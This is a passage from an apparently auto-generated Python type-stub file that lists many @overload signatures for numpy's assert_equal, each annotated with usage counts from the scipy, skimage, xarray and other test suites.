...
@overload
def assert_equal(actual: Type[numpy.ndarray], desired: Type[numpy.ndarray]):
"""
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: Literal["pil"], desired: Literal["pil"]):
"""
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: Literal["matplotlib"], desired: Literal["matplotlib"]):
"""
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: int, desired: numpy.ndarray):
"""
usage.scipy: 6
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: int):
"""
usage.scipy: 30
usage.skimage: 56
usage.xarray: 2
"""
...
@overload
def assert_equal(actual: float, desired: float):
"""
usage.scipy: 125
usage.skimage: 2
"""
...
@overload
def assert_equal(
actual: Tuple[slice[int, int, int], slice[int, int, int]],
desired: Tuple[slice[int, int, int], slice[int, int, int]],
):
"""
usage.skimage: 2
"""
...
@overload
def assert_equal(actual: numpy.int64, desired: numpy.int64):
"""
usage.scipy: 24
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: List[numpy.float64], desired: List[numpy.float64]):
"""
usage.matplotlib: 1
usage.skimage: 1
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.float64, numpy.float64],
desired: Tuple[numpy.float64, numpy.float64],
):
"""
usage.scipy: 1
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: bool, desired: bool, err_msg: str):
"""
usage.scipy: 1
usage.skimage: 4
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[bool]):
"""
usage.scipy: 6
usage.skimage: 4
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[numpy.uint8]):
"""
usage.scipy: 11
usage.skimage: 5
"""
...
@overload
def assert_equal(actual: numpy.uint8, desired: numpy.uint8):
"""
usage.scipy: 3
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: numpy.int64, desired: numpy.ndarray):
"""
usage.skimage: 3
"""
...
@overload
def assert_equal(actual: numpy.uint64, desired: numpy.uint64):
"""
usage.scipy: 3
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: numpy.uint64, desired: numpy.ndarray):
"""
usage.skimage: 4
"""
...
@overload
def assert_equal(actual: numpy.uint8, desired: numpy.ndarray):
"""
usage.skimage: 2
"""
...
@overload
def assert_equal(actual: Tuple[int], desired: numpy.ndarray):
"""
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: Tuple[int, int], desired: numpy.ndarray):
"""
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: Tuple[int, int, int], desired: numpy.ndarray):
"""
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: Tuple[int, int, int, int], desired: numpy.ndarray):
"""
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: Tuple[int, int, int, int, int], desired: numpy.ndarray):
"""
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: numpy.int16, desired: int):
"""
usage.skimage: 2
"""
...
@overload
def assert_equal(actual: numpy.float32, desired: int):
"""
usage.scipy: 6
usage.skimage: 2
"""
...
@overload
def assert_equal(actual: numpy.float32, desired: float):
"""
usage.scipy: 5
usage.skimage: 4
"""
...
@overload
def assert_equal(actual: numpy.uint16, desired: int):
"""
usage.skimage: 2
"""
...
@overload
def assert_equal(actual: numpy.uint32, desired: int):
"""
usage.skimage: 2
"""
...
@overload
def assert_equal(actual: numpy.int32, desired: int):
"""
usage.scipy: 15
usage.skimage: 2
"""
...
@overload
def assert_equal(actual: numpy.int8, desired: int):
"""
usage.scipy: 5
usage.skimage: 2
"""
...
@overload
def assert_equal(
actual: Tuple[slice[None, None, None], slice[None, None, None]],
desired: List[slice[None, None, None]],
):
"""
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: int, desired: numpy.float64):
"""
usage.skimage: 1
"""
...
@overload
def assert_equal(
actual: Tuple[
slice[numpy.int64, None, numpy.int64], slice[numpy.int64, None, numpy.int64]
],
desired: List[slice[float, None, float]],
):
"""
usage.skimage: 2
"""
...
@overload
def assert_equal(
actual: Tuple[
slice[numpy.int64, None, numpy.int64],
slice[numpy.int64, None, numpy.int64],
slice[numpy.int64, None, numpy.int64],
],
desired: List[slice[float, None, float]],
):
"""
usage.skimage: 1
"""
...
@overload
def assert_equal(
actual: Tuple[int, int, int, int, int, int],
desired: Tuple[int, int, int, int, int, int],
):
"""
usage.scipy: 5
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[List[List[List[int]]]]):
"""
usage.skimage: 4
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[cftime._cftime.DatetimeNoLeap]):
"""
usage.xarray: 3
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: list):
"""
usage.scipy: 7
usage.xarray: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[cftime._cftime.Datetime360Day]):
"""
usage.xarray: 3
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[cftime._cftime.DatetimeJulian]):
"""
usage.xarray: 3
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[cftime._cftime.DatetimeAllLeap]):
"""
usage.xarray: 3
"""
...
@overload
def assert_equal(
actual: numpy.ndarray, desired: List[cftime._cftime.DatetimeGregorian]
):
"""
usage.xarray: 3
"""
...
@overload
def assert_equal(
actual: numpy.ndarray, desired: List[cftime._cftime.DatetimeProlepticGregorian]
):
"""
usage.xarray: 2
"""
...
@overload
def assert_equal(actual: xarray.core.dataarray.DataArray, desired: numpy.ndarray):
"""
usage.xarray: 1
"""
...
@overload
def assert_equal(actual: numpy.int32, desired: numpy.int32):
"""
usage.scipy: 5
usage.xarray: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: numpy.int32):
"""
usage.scipy: 1
usage.xarray: 1
"""
...
@overload
def assert_equal(actual: numpy.float32, desired: numpy.float32):
"""
usage.scipy: 5
usage.xarray: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: numpy.float32):
"""
usage.scipy: 1
usage.xarray: 1
"""
...
@overload
def assert_equal(actual: object, desired: object):
"""
usage.scipy: 1
usage.xarray: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: object):
"""
usage.xarray: 1
"""
...
@overload
def assert_equal(actual: numpy.str_, desired: Literal["foo"]):
"""
usage.xarray: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: Literal["foo"]):
"""
usage.xarray: 1
"""
...
@overload
def assert_equal(actual: numpy.datetime64, desired: numpy.datetime64):
"""
usage.xarray: 2
"""
...
@overload
def assert_equal(actual: numpy.timedelta64, desired: numpy.timedelta64):
"""
usage.xarray: 2
"""
...
@overload
def assert_equal(actual: bool, desired: bool):
"""
usage.scipy: 104
"""
...
@overload
def assert_equal(actual: Literal["another name"], desired: Literal["another name"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Tuple[int], desired: Tuple[int], err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[int, int, int, int], desired: Tuple[int, int, int, int], err_msg: str
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[numpy.float64]):
"""
usage.scipy: 35
"""
...
@overload
def assert_equal(
actual: Type[numpy.random.mtrand.RandomState],
desired: Type[numpy.random.mtrand.RandomState],
):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(
actual: Type[numpy.random._generator.Generator],
desired: Type[numpy.random._generator.Generator],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: scipy._lib._util.FullArgSpec, desired: scipy._lib._util.FullArgSpec
):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(actual: List[numpy.float64], desired: numpy.ndarray):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(actual: Literal["bad signature"], desired: Literal["bad signature"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: float, desired: int):
"""
usage.scipy: 29
"""
...
@overload
def assert_equal(actual: List[float], desired: List[float]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.ndarray, numpy.ndarray],
desired: Tuple[numpy.ndarray, numpy.ndarray],
):
"""
usage.scipy: 11
"""
...
@overload
def assert_equal(actual: List[int], desired: numpy.ndarray):
"""
usage.scipy: 13
"""
...
@overload
def assert_equal(actual: List[int], desired: List[int]):
"""
usage.scipy: 15
"""
...
@overload
def assert_equal(actual: numpy.bool_, desired: bool):
"""
usage.scipy: 19
"""
...
@overload
def assert_equal(
actual: List[Literal["g", "m", "c"]], desired: List[Literal["g", "m", "c"]]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Literal["weak mixing angle"]],
desired: List[Literal["weak mixing angle"]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: list, desired: list):
"""
usage.matplotlib: 2
usage.scipy: 6
"""
...
@overload
def assert_equal(
actual: Literal["299792458 m s^-1"], desired: Literal["299792458 m s^-1"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[float]):
"""
usage.matplotlib: 1
usage.scipy: 19
usage.sklearn: 1
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[numpy.complex256]):
"""
usage.scipy: 16
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[numpy.complex128]):
"""
usage.scipy: 35
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[numpy.complex64]):
"""
usage.scipy: 47
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[numpy.float32]):
"""
usage.scipy: 37
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: numpy.ndarray, err_msg: str):
"""
usage.scipy: 36
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.int32, numpy.int32, numpy.int32], desired: Tuple[int, int, int]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: type, desired: type):
"""
usage.scipy: 10
"""
...
@overload
def assert_equal(actual: Tuple[int, int, int, int], desired: List[int]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Tuple[int, int, int, int, int, int], desired: List[int]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[numpy.ndarray]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Tuple[None, ...], desired: Tuple[None, ...]):
"""
usage.scipy: 12
"""
...
@overload
def assert_equal(actual: Tuple[float, float], desired: Tuple[float, float]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[numpy.float16]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[numpy.float128]):
"""
usage.scipy: 15
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[List[Union[int, float]]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[int, int, int],
desired: Tuple[int, int, int],
err_msg: Literal["nearest"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[int, int, int],
desired: Tuple[int, int, int],
err_msg: Literal["linear"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[int, int],
desired: Tuple[int, int],
err_msg: Literal["('nearest', True)"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[int, int],
desired: Tuple[int, int],
err_msg: Literal["('nearest', False)"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[int, int],
desired: Tuple[int, int],
err_msg: Literal["('linear', True)"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[int, int],
desired: Tuple[int, int],
err_msg: Literal["('linear', False)"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[int, int],
desired: Tuple[int, int],
err_msg: Literal["('cubic', True)"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[int, int],
desired: Tuple[int, int],
err_msg: Literal["('cubic', False)"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[int, int, int, int, int, int, int],
desired: Tuple[int, int, int, int, int, int, int],
):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(
actual: List[Literal["nominal", "numeric"]],
desired: List[Literal["nominal", "numeric"]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Literal["attr_date_number"], desired: Literal["attr_date_number"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["relational"], desired: Literal["relational"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: Literal["attr_date"], desired: Literal["attr_date"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["date"], desired: Literal["date"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["attr_number"], desired: Literal["attr_number"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: Literal["numeric"], desired: Literal["numeric"]):
"""
usage.scipy: 4
"""
...
@overload
def assert_equal(
actual: Literal["attr_relational"], desired: Literal["attr_relational"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["age"], desired: Literal["age"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: Literal["smoker"], desired: Literal["smoker"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: Literal["nominal"], desired: Literal["nominal"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[Literal["yes"], Literal["no"]], desired: List[Literal["no", "yes"]]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[Literal[" yes"], Literal["no "]],
desired: List[Literal["no ", " yes"]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Dict[Literal["min", "repeat", "width"], Union[None, int]],
desired: Dict[Literal["min", "repeat", "width"], Union[None, int]],
):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(
actual: Dict[Literal["min", "repeat", "significand", "width"], Union[None, int]],
desired: Dict[Literal["min", "repeat", "significand", "width"], Union[None, int]],
):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(
actual: Dict[Literal["min", "repeat", "significand", "width"], Union[int, None]],
desired: Dict[Literal["min", "repeat", "significand", "width"], Union[int, None]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Dict[Literal["min", "repeat", "significand", "width"], int],
desired: Dict[Literal["min", "repeat", "significand", "width"], int],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["(I10)"], desired: Literal["(I10)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["(I12.10)"], desired: Literal["(I12.10)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["(3I12.10)"], desired: Literal["(3I12.10)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["(E10.5)"], desired: Literal["(E10.5)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["(E12.10)"], desired: Literal["(E12.10)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["(E12.10E3)"], desired: Literal["(E12.10E3)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["(3E10.5)"], desired: Literal["(3E10.5)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["inline"], desired: Literal["inline"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["testdouble"], Tuple[int, int], Literal["double"]]],
desired: List[Tuple[Literal["testdouble"], Tuple[int, int], Literal["double"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["teststring"], Tuple[int], Literal["char"]]],
desired: List[Tuple[Literal["teststring"], Tuple[int], Literal["char"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["testcomplex"], Tuple[int, int], Literal["double"]]],
desired: List[Tuple[Literal["testcomplex"], Tuple[int, int], Literal["double"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["testmatrix"], Tuple[int, int], Literal["double"]]],
desired: List[Tuple[Literal["testmatrix"], Tuple[int, int], Literal["double"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["testsparse"], Tuple[int, int], Literal["sparse"]]],
desired: List[Tuple[Literal["testsparse"], Tuple[int, int], Literal["sparse"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[
Tuple[Literal["testsparsecomplex"], Tuple[int, int], Literal["sparse"]]
],
desired: List[
Tuple[Literal["testsparsecomplex"], Tuple[int, int], Literal["sparse"]]
],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["a", "theta"], Tuple[int, int], Literal["double"]]],
desired: List[Tuple[Literal["a", "theta"], Tuple[int, int], Literal["double"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["testminus"], Tuple[int, int], Literal["double"]]],
desired: List[Tuple[Literal["testminus"], Tuple[int, int], Literal["double"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["testonechar"], Tuple[int], Literal["char"]]],
desired: List[Tuple[Literal["testonechar"], Tuple[int], Literal["char"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["testcell"], Tuple[int, int], Literal["cell"]]],
desired: List[Tuple[Literal["testcell"], Tuple[int, int], Literal["cell"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["testscalarcell"], Tuple[int, int], Literal["cell"]]],
desired: List[Tuple[Literal["testscalarcell"], Tuple[int, int], Literal["cell"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["testemptycell"], Tuple[int, int], Literal["cell"]]],
desired: List[Tuple[Literal["testemptycell"], Tuple[int, int], Literal["cell"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["teststringarray"], Tuple[int], Literal["char"]]],
desired: List[Tuple[Literal["teststringarray"], Tuple[int], Literal["char"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[
Tuple[Literal["test3dmatrix"], Tuple[int, int, int], Literal["double"]]
],
desired: List[
Tuple[Literal["test3dmatrix"], Tuple[int, int, int], Literal["double"]]
],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["teststruct"], Tuple[int, int], Literal["struct"]]],
desired: List[Tuple[Literal["teststruct"], Tuple[int, int], Literal["struct"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["testcellnest"], Tuple[int, int], Literal["cell"]]],
desired: List[Tuple[Literal["testcellnest"], Tuple[int, int], Literal["cell"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
# ---------------------------------------------------------------------------
# Auto-generated @overload stubs for an overloaded `assert_equal`.
# Each stub records one concrete (actual, desired[, err_msg]) argument-type
# combination observed in downstream test suites; the docstring lines of the
# form "usage.<project>: <count>" are machine-readable usage counts, not
# prose documentation.
# NOTE(review): this looks like python-record-api / stub-generator output —
# the docstrings are data consumed by tooling, so do not hand-edit them;
# confirm against the generator before changing anything in this block.
# ---------------------------------------------------------------------------
@overload
def assert_equal(
    actual: List[Tuple[Literal["teststructnest"], Tuple[int, int], Literal["struct"]]],
    desired: List[Tuple[Literal["teststructnest"], Tuple[int, int], Literal["struct"]]],
    err_msg: str,
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: List[Tuple[Literal["teststructarr"], Tuple[int, int], Literal["struct"]]],
    desired: List[Tuple[Literal["teststructarr"], Tuple[int, int], Literal["struct"]]],
    err_msg: str,
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: List[Tuple[Literal["testobject"], Tuple[int, int], Literal["object"]]],
    desired: List[Tuple[Literal["testobject"], Tuple[int, int], Literal["object"]]],
    err_msg: str,
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: List[Tuple[Literal["testunicode"], Tuple[int], Literal["char"]]],
    desired: List[Tuple[Literal["testunicode"], Tuple[int], Literal["char"]]],
    err_msg: str,
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: List[Tuple[Literal["testbools"], Tuple[int, int], Literal["logical"]]],
    desired: List[Tuple[Literal["testbools"], Tuple[int, int], Literal["logical"]]],
    err_msg: str,
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: List[Literal["avar"]], desired: List[Literal["avar"]]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: set, desired: set):
    """
    usage.scipy: 15
    """
    ...
@overload
def assert_equal(actual: Type[numpy.float64], desired: Type[numpy.float64]):
    """
    usage.scipy: 12
    """
    ...
@overload
def assert_equal(actual: Type[numpy.str_], desired: Type[numpy.str_]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: Type[numpy.int64], desired: Type[numpy.int64]):
    """
    usage.scipy: 7
    """
    ...
@overload
def assert_equal(actual: Type[numpy.object_], desired: Type[numpy.object_]):
    """
    usage.scipy: 3
    """
    ...
@overload
def assert_equal(actual: numpy.ndarray, desired: Literal["python"]):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(actual: numpy.ndarray, desired: Literal["not perl"]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: numpy.ndarray, desired: Literal["a string"]):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(actual: int, desired: bool):
    """
    usage.scipy: 3
    """
    ...
@overload
def assert_equal(actual: Type[numpy.uint8], desired: Type[numpy.uint8]):
    """
    usage.scipy: 7
    """
    ...
@overload
def assert_equal(actual: Literal["u"], desired: Literal["u"]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: Literal["f"], desired: Literal["f"]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: List[Literal["theta"]], desired: List[Literal["theta"]]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: Literal["arr"], desired: Literal["arr"]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: Literal["mystr"], desired: Literal["mystr"]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: Literal["mynum"], desired: Literal["mynum"]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: numpy.ndarray, desired: Literal["Schrödinger"]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: Type[numpy.bool_], desired: Type[numpy.bool_]):
    """
    usage.scipy: 1
    """
    ...
# NOTE(review): the replacement character (U+FFFD) in the literal below looks
# like intentional recorded data (a deliberately broken string from a scipy
# test), not a mojibake defect in this file — confirm against the generator
# input before "fixing" it.
@overload
def assert_equal(actual: numpy.ndarray, desired: Literal["� am broken"]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: bytes, desired: bytes):
    """
    usage.scipy: 24
    """
    ...
@overload
def assert_equal(actual: numpy.ndarray, desired: Literal[" "]):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(actual: bytes, desired: bytes, err_msg: str):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: numpy.int16, desired: numpy.int16):
    """
    usage.scipy: 3
    """
    ...
@overload
def assert_equal(actual: Type[numpy.int16], desired: Type[numpy.int16]):
    """
    usage.scipy: 7
    """
    ...
@overload
def assert_equal(actual: Type[numpy.int32], desired: Type[numpy.int32]):
    """
    usage.scipy: 7
    """
    ...
@overload
def assert_equal(actual: Type[numpy.float32], desired: Type[numpy.float32]):
    """
    usage.scipy: 15
    """
    ...
@overload
def assert_equal(actual: numpy.complex64, desired: numpy.complex64):
    """
    usage.scipy: 3
    """
    ...
@overload
def assert_equal(actual: Type[numpy.complex64], desired: Type[numpy.complex64]):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(actual: bytes, desired: numpy.bytes_):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: Type[numpy.bytes_], desired: Type[numpy.bytes_]):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: numpy.complex128, desired: numpy.complex128):
    """
    usage.scipy: 7
    """
    ...
@overload
def assert_equal(actual: Type[numpy.complex128], desired: Type[numpy.complex128]):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(actual: numpy.uint16, desired: numpy.uint16):
    """
    usage.scipy: 3
    """
    ...
@overload
def assert_equal(actual: Type[numpy.uint16], desired: Type[numpy.uint16]):
    """
    usage.scipy: 6
    """
    ...
@overload
def assert_equal(actual: numpy.uint32, desired: numpy.uint32):
    """
    usage.scipy: 3
    """
    ...
@overload
def assert_equal(actual: Type[numpy.uint32], desired: Type[numpy.uint32]):
    """
    usage.scipy: 6
    """
    ...
@overload
def assert_equal(actual: Type[numpy.uint64], desired: Type[numpy.uint64]):
    """
    usage.scipy: 6
    """
    ...
@overload
def assert_equal(
    actual: Tuple[int, int, int, int, int, int, int, int],
    desired: Tuple[int, int, int, int, int, int, int, int],
):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(
    actual: Tuple[
        int, int, int, Literal["array"], Literal["integer"], Literal["general"]
    ],
    desired: Tuple[
        int, int, int, Literal["array"], Literal["integer"], Literal["general"]
    ],
):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(
    actual: Tuple[
        int, int, int, Literal["array"], Literal["unsigned-integer"], Literal["general"]
    ],
    desired: Tuple[
        int, int, int, Literal["array"], Literal["unsigned-integer"], Literal["general"]
    ],
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: Tuple[int, int, int, Literal["array"], Literal["real"], Literal["general"]],
    desired: Tuple[
        int, int, int, Literal["array"], Literal["real"], Literal["general"]
    ],
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: Tuple[
        int, int, int, Literal["array"], Literal["complex"], Literal["general"]
    ],
    desired: Tuple[
        int, int, int, Literal["array"], Literal["complex"], Literal["general"]
    ],
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: Tuple[
        int, int, int, Literal["array"], Literal["integer"], Literal["symmetric"]
    ],
    desired: Tuple[
        int, int, int, Literal["array"], Literal["integer"], Literal["symmetric"]
    ],
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: Tuple[
        int,
        int,
        int,
        Literal["array"],
        Literal["unsigned-integer"],
        Literal["symmetric"],
    ],
    desired: Tuple[
        int,
        int,
        int,
        Literal["array"],
        Literal["unsigned-integer"],
        Literal["symmetric"],
    ],
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: Tuple[
        int, int, int, Literal["array"], Literal["integer"], Literal["skew-symmetric"]
    ],
    desired: Tuple[
        int, int, int, Literal["array"], Literal["integer"], Literal["skew-symmetric"]
    ],
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(actual: List[List[int]], desired: numpy.ndarray):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: Tuple[
        int, int, int, Literal["array"], Literal["real"], Literal["skew-symmetric"]
    ],
    desired: Tuple[
        int, int, int, Literal["array"], Literal["real"], Literal["skew-symmetric"]
    ],
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: Tuple[
        int, int, int, Literal["array"], Literal["complex"], Literal["hermitian"]
    ],
    desired: Tuple[
        int, int, int, Literal["array"], Literal["complex"], Literal["hermitian"]
    ],
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: Tuple[
        int, int, int, Literal["array"], Literal["real"], Literal["symmetric"]
    ],
    desired: Tuple[
        int, int, int, Literal["array"], Literal["real"], Literal["symmetric"]
    ],
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: Tuple[
        int, int, int, Literal["coordinate"], Literal["integer"], Literal["general"]
    ],
    desired: Tuple[
        int, int, int, Literal["coordinate"], Literal["integer"], Literal["general"]
    ],
):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(actual: numpy.matrix, desired: numpy.matrix):
    """
    usage.scipy: 154
    """
    ...
@overload
def assert_equal(
    actual: Tuple[
        int,
        int,
        int,
        Literal["coordinate"],
        Literal["unsigned-integer"],
        Literal["general"],
    ],
    desired: Tuple[
        int,
        int,
        int,
        Literal["coordinate"],
        Literal["unsigned-integer"],
        Literal["general"],
    ],
):
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_equal(
    actual: Tuple[
        int, int, int, Literal["coordinate"], Literal["real"], Literal["general"]
    ],
    desired: Tuple[
        int, int, int, Literal["coordinate"], Literal["real"], Literal["general"]
    ],
):
    """
    usage.scipy: 3
    """
    ...
@overload
def assert_equal(
    actual: Tuple[
        int, int, int, Literal["coordinate"], Literal["complex"], Literal["general"]
    ],
    desired: Tuple[
        int, int, int, Literal["coordinate"], Literal["complex"], Literal["general"]
    ],
):
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_equal(
    actual: Tuple[
        int, int, int, Literal["coordinate"], Literal["integer"], Literal["symmetric"]
    ],
    desired: Tuple[
        int, int, int, Literal["coordinate"], Literal["integer"], Literal["symmetric"]
    ],
):
    """
    usage.scipy: 2
    """
    ...
@overload
